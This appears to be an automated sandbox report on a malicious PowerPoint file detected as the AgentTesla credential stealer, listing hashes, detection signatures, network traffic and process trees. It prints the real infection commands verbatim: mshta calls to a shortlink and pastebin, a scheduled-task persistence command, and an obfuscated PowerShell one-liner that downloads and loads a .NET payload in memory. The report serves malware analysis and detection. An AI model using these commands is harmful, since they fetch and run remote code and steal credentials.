
Analysis Report HHS290620-024.ppt

Overview

General Information

Sample Name: HHS290620-024.ppt
MD5: 2e5faf5df0e909aa914717d2c3f62bc4
SHA1: 47795bb3d37270e2882541df837360389b634152
SHA256: 2af288465c8fe02c371ce137c86b8137c3c017e7a9ea94ef0aa6ac5025dca649

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Mshta Download Pastebin
Sigma detected: Powershell execute code from registry
Sigma detected: Schedule script from internet via mshta
Yara detected AgentTesla
Connects to a URL shortener service
Connects to a pastebin service (likely for C&C)
Creates a scheduled task launching mshta.exe (likely to bypass HIPS)
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Creates processes via WMI
Document exploit detected (process start blacklist hit)
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Microsoft Office Product Spawning Windows Shell
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Adds / modifies Windows certificates
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Domain name seen in connection with other malware
Enables debug privileges
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Startup

  • System is w7
  • POWERPNT.EXE (PID: 3756 cmdline: 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /AUTOMATION -Embedding MD5: 0F144ECA8CFEC8882A3809D176886255)
  • cmd.exe (PID: 3840 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Users\user\Desktop\HHS290620-024.ppt' MD5: AD7B9C14083B52BC532FBA5948342B98)
    • POWERPNT.EXE (PID: 3880 cmdline: 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\HHS290620-024.ppt' MD5: 0F144ECA8CFEC8882A3809D176886255)
      • mshta.exe (PID: 4004 cmdline: mshta http://%40%40%40@j.mp/sdhgas6asdasdgha MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
        • schtasks.exe (PID: 2148 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn 'win2 update' /tr '\''mshta\'http:\\pastebin.com\raw\DBMBYsw4' /F MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • mshta.exe (PID: 2128 cmdline: 'C:\Windows\System32\mshta.exe' 'http:\\pastebin.com\raw\DBMBYsw4' MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
  • powershell.exe (PID: 2092 cmdline: powershell ((gp HKCU:\Software).iamresearcher)|IEX MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    • MSBuild.exe (PID: 2832 cmdline: {path} MD5: EDDC75B478D9F9AAF6BE7BE069298455)
  • taskeng.exe (PID: 2400 cmdline: taskeng.exe {CE29C75C-2582-4048-996B-635B65BF5C70} S-1-5-21-290172400-2828352916-2832973385-1004:computer\user:Interactive:[1] MD5: 4F2659160AFCCA990305816946F69407)
  • mshta.exe (PID: 2612 cmdline: 'C:\Windows\system32\mshta.exe' 'http:\\pastebin.com\raw\9Lm52LAJ' MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
  • powershell.exe (PID: 2628 cmdline: powershell.exe -nologo -WindowStyle Hidden $_Xpin = ((New-Object Net.WebClient).DowNloAdSTRiNg('h'+'t'+'t'+'p'+'s'+':'+'/'+'/'+'p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+'/'+'r'+'a'+'w'+'/L7UDNEGk'));$_Xpin=$_Xpin.replace('.','*!(@*#(!@#*').replace('*!(@*#(!@#*','0');$_Xpin = $_Xpin.ToCharArray();[Array]::Reverse($_Xpin);[byte[]]$_PMP = [System.Convert]::FromBase64String($_Xpin);$_1 = [System.Threading.Thread]::GetDomain().Load($_PMP);$_1.EntryPoint.invoke($S,$X) MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  • mshta.exe (PID: 2704 cmdline: 'C:\Windows\system32\mshta.exe' 'http:\\pastebin.com\raw\fAFqQYgZ' MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
  • powershell.exe (PID: 2656 cmdline: powershell ((gp HKCU:\Software).iamresearcher)|IEX MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  • mshta.exe (PID: 2640 cmdline: 'C:\Windows\system32\mshta.exe' 'http:\\pastebin.com\raw\z0h2yS0U' MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
  • mshta.exe (PID: 3384 cmdline: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''powershell ((gp HKCU:\Software).iamresearcher)|IEX'', 0 : window.close') MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
    • powershell.exe (PID: 3412 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).iamresearcher)|IEX MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000015.00000002.1220248955.00402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000015.00000002.1230994465.01C30000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: MSBuild.exe PID: 2832 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Process Memory Space: MSBuild.exe PID: 2832 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
21.2.MSBuild.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Mshta Download Pastebin
Source: Process started | Author: Joe Security | Data: Command: 'C:\Windows\System32\mshta.exe' 'http:\\pastebin.com\raw\DBMBYsw4', CommandLine: 'C:\Windows\System32\mshta.exe' 'http:\\pastebin.com\raw\DBMBYsw4', CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: mshta http://%40%40%40@j.mp/sdhgas6asdasdgha, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4004, ProcessCommandLine: 'C:\Windows\System32\mshta.exe' 'http:\\pastebin.com\raw\DBMBYsw4', ProcessId: 2128
Sigma detected: Powershell execute code from registry
Source: Process started | Author: Joe Security | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).iamresearcher)|IEX, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).iamresearcher)|IEX, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''powershell ((gp HKCU:\Software).iamresearcher)|IEX'', 0 : window.close'), ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3384, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).iamresearcher)|IEX, ProcessId: 3412
Sigma detected: Schedule script from internet via mshta
Source: Process started | Author: Joe Security | Data: Command: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn 'win2 update' /tr '\''mshta\'http:\\pastebin.com\raw\DBMBYsw4' /F , CommandLine: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn 'win2 update' /tr '\''mshta\'http:\\pastebin.com\raw\DBMBYsw4' /F , CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: mshta http://%40%40%40@j.mp/sdhgas6asdasdgha, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4004, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn 'win2 update' /tr '\''mshta\'http:\\pastebin.com\raw\DBMBYsw4' /F , ProcessId: 2148
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started | Author: Michael Haag | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).iamresearcher)|IEX, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).iamresearcher)|IEX, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''powershell ((gp HKCU:\Software).iamresearcher)|IEX'', 0 : window.close'), ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3384, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).iamresearcher)|IEX, ProcessId: 3412
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis | Data: Command: mshta http://%40%40%40@j.mp/sdhgas6asdasdgha, CommandLine: mshta http://%40%40%40@j.mp/sdhgas6asdasdgha, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\HHS290620-024.ppt', ParentImage: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE, ParentProcessId: 3880, ProcessCommandLine: mshta http://%40%40%40@j.mp/sdhgas6asdasdgha, ProcessId: 4004

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: HHS290620-024.ppt | Virustotal: Detection: 14%
Machine Learning detection for sample
Source: HHS290620-024.ppt | Joe Sandbox ML: detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process created: C:\Windows\System32\mshta.exe
Source: global traffic | DNS query: name: j.mp
Source: global traffic | TCP traffic: 192.168.2.2:49159 -> 104.23.98.190:443
Source: global traffic | TCP traffic: 192.168.2.2:49158 -> 67.199.248.16:80

Networking:

Connects to a URL shortener service
Source: unknown | DNS query: name: j.mp
Connects to a pastebin service (likely for C&C)
Source: unknown | DNS query: name: pastebin.com (12 identical entries)
Source: Joe Sandbox View | Domain Name: j.mp
Source: Joe Sandbox View | IP Address: 104.23.99.190
Source: Joe Sandbox View | IP Address: 67.199.248.16
Source: Joe Sandbox View | IP Address: 104.23.98.190
Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox View | JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
Source: global traffic | HTTP traffic detected: GET /sdhgas6asdasdgha HTTP/1.1 | Accept: */* | Accept-Language: en-US | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: j.mp | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/DBMBYsw4 HTTP/1.1 | Accept: */* | Accept-Language: en-US | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: pastebin.com | Connection: Keep-Alive | Cookie: __cfduid=d0d64003ec7d772cd2c5303cf9fc4b5391593459015
Source: global traffic | HTTP traffic detected: GET /raw/9Lm52LAJ HTTP/1.1 | Accept: */* | Accept-Language: en-US | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: pastebin.com | Connection: Keep-Alive | Cookie: __cfduid=d0d64003ec7d772cd2c5303cf9fc4b5391593459015
Source: global traffic | HTTP traffic detected: GET /raw/fAFqQYgZ HTTP/1.1 | Accept: */* | Accept-Language: en-US | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: pastebin.com | Connection: Keep-Alive | Cookie: __cfduid=d0d64003ec7d772cd2c5303cf9fc4b5391593459015
Source: global traffic | HTTP traffic detected: GET /raw/z0h2yS0U HTTP/1.1 | Accept: */* | Accept-Language: en-US | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: pastebin.com | Connection: Keep-Alive | Cookie: __cfduid=d0d64003ec7d772cd2c5303cf9fc4b5391593459015
Source: C:\Windows\System32\mshta.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZWG4GL8S\sdhgas6asdasdgha[1].htm
Source: mshta.exe, 00000005.00000003.894187184.00423000.00000004.00000001.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown | DNS traffic detected: queries for: j.mp

            Source: C:\Windows\System32\mshta.exe | Window created: window name: CLIPBRDWNDCLASS

            System Summary:

            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | Code function: 21_2_0038B362 NtQuerySystemInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | Code function: 21_2_0038B331 NtQuerySystemInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | Code function: 21_2_00EDEBC8
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | Code function: 21_2_00EDD240
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | Code function: 21_2_00EDDA58
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | Code function: 21_2_00ED0016
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | Code function: 21_2_00EDDDC3
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | Code function: 21_2_00EDF2D0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | Code function: 21_2_00EDF2BF
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | Code function: 21_2_00EDEBB8
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | Code function: 21_2_00EDDE30
            Source: HHS290620-024.ppt | OLE, VBA macro line: Sub Auto_Close()
            Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function Auto_Close | Name: Auto_Close
            Source: HHS290620-024.ppt | OLE indicator, VBA macros: true
            Source: HHS290620-024.ppt | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: classification engine | Classification label: mal100.troj.expl.evad.winPPT@24/16@13/3
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | Code function: 21_2_0038B1E6 AdjustTokenPrivileges
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | Code function: 21_2_0038B1AF AdjustTokenPrivileges
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\HHS290620-024.LNK
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRD4C0.tmp
            Source: C:\Windows\System32\schtasks.exe | Console Write: ...........u..0.........,...|...............................`.3...S...U...U.......#...3...........#..........,@...#.G.\u
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: .........3]i....#........3]i......3.L|\iT.....Sl 'bi..Sl....L|\i.............7]i@.....\i..3...G............. 'bi..\i....
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........D.......#.....G........uD..................u..0.........`...D.......................#.......$.......>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................/.....G........u...................u..0.........`...D......................./...............>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........D......./.....G........uD..................u..0.........`...D......................./.......$.......>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................;.....G........u...................u..0.........`...D...;...................;...............>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........D.......;.....G........uD..................u..0.........`...D...V...................;.......$.......>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................G...A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.2.3.........`...D...~...................G...........$...>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........D.......G.....G........uD..................u..0.........`...D.......................G.......$.......>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................S.....G........u...................u..0.........`...D.......................S...............>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........D.......S.....G........uD..................u..0.........`...D.......................S.......$.......>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................_.....G........u...................u..0.........`...D......................._...............>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........D......._.....G........uD..................u..0.........`...D......................._.......$.......>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................k.....G........u...................u..0.........`...D...V...................k...............>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........D.......k.....G........uD..................u..0.........`...D.......................k.......$.......>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................w.....G........u...................u..0.........`...........................w...............>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........D.......w.....G........uD..................u..0.........`...........................w.......$.......>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ......................G........u...................u..0.........`...........................................>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........D.............G........uD..................u..0.........`...................................$.......>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ......................G........u...................u..0.........`.......?...............................T...>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........D.............G........uD..................u..0.........`.......Z...........................$.......>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ......................G........u...................u..0.........`...........................................>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........D.............G........uD..................u..0.........`...................................$.......>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ......................G........u...................u..0.........`.......................................t...>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........D.............G........uD..................u..0.........`...D...............................$.......>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: .................... .G........u...................u..0.........`...D..."...................................>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........D.............G........uD..................u..0.........`...D...=...........................$.......>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Windows\System32\mshta.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | File read: C:\Users\desktop.ini
            Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\System32\mshta.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: HHS290620-024.ppt | Virustotal: Detection: 14%
            Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /AUTOMATION -Embedding
            Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Users\user\Desktop\HHS290620-024.ppt'
            Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\HHS290620-024.ppt'
            Source: unknown | Process created: C:\Windows\System32\mshta.exe mshta http://%40%40%40@j.mp/sdhgas6asdasdgha
            Source: unknown | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn 'win2 update' /tr '\''mshta\'http:\\pastebin.com\raw\DBMBYsw4' /F
            Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'http:\\pastebin.com\raw\DBMBYsw4'
            Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ((gp HKCU:\Software).iamresearcher)|IEX
            Source: unknown | Process created: C:\Windows\System32\taskeng.exe taskeng.exe {CE29C75C-2582-4048-996B-635B65BF5C70} S-1-5-21-290172400-2828352916-2832973385-1004:computer\user:Interactive:[1]
            Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\mshta.exe' 'http:\\pastebin.com\raw\9Lm52LAJ'
            Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nologo -WindowStyle Hidden $_Xpin = ((New-Object Net.WebClient).DowNloAdSTRiNg('h'+'t'+'t'+'p'+'s'+':'+'/'+'/'+'p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+'/'+'r'+'a'+'w'+'/L7UDNEGk'));$_Xpin=$_Xpin.replace('.','*!(@*#(!@#*').replace('*!(@*#(!@#*','0');$_Xpin = $_Xpin.ToCharArray();[Array]::Reverse($_Xpin);[byte[]]$_PMP = [System.Convert]::FromBase64String($_Xpin);$_1 = [System.Threading.Thread]::GetDomain().Load($_PMP);$_1.EntryPoint.invoke($S,$X)
            Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\mshta.exe' 'http:\\pastebin.com\raw\fAFqQYgZ'
            Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe {path}
            Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\mshta.exe' 'http:\\pastebin.com\raw\z0h2yS0U'
            Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''powershell ((gp HKCU:\Software).iamresearcher)|IEX'', 0 : window.close')
            Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).iamresearcher)|IEX
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\HHS290620-024.ppt'
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process created: C:\Windows\System32\mshta.exe mshta http://%40%40%40@j.mp/sdhgas6asdasdgha
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn 'win2 update' /tr '\''mshta\'http:\\pastebin.com\raw\DBMBYsw4' /F
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'http:\\pastebin.com\raw\DBMBYsw4'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe {path}
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).iamresearcher)|IEX
            Source: C:\Windows\System32\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
            Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\PowerPoint\Resiliency\StartupItems
